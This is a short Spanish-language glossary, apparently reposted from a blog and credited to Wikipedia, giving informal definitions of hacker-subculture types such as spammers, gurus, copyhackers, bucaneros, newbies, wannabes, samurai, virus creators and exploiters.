Spammer
Persona que roba o compra direcciones de correo electrónico sustraídas y remite e-mails no solicitados

Gurus
Son los expertos en algun área, entiendase por experto conocer "TODO". Se suelen encargar de formar a futuros hackers

CopyHackers
Falsificadores que comercializan todo lo copiado

Bucaneros
Personas con escaso conocimiento informatico que se dedican a la venta de productos comprados a los copyhackers

Newbie
Son los novatos del hackero

Wannaber
Newbie que desea ser hacker pero estos consideran que su coeficiente no da para tal fin (Wannaber= wanna be =quiero ser)

Samurai
Son los llamados "hackers a sueldo" trabajan solos y saben que todo puede ser tumbado si se tiene dinero suficiente para pagarlo

Creadores de virus
Aqui se ha de diferenciar entre el programador del virus y el propagador, sienten un gran placer al ver que su "software" ha sido ampliamente "adquirido" por el publico

Explo1ter
Son personas que aprovechan un error en la programación de un programa para obtener diversos privilegios sobre el software

Fuente: Wikipedia


Extraído de http://unlugarsinfin.blogspot.es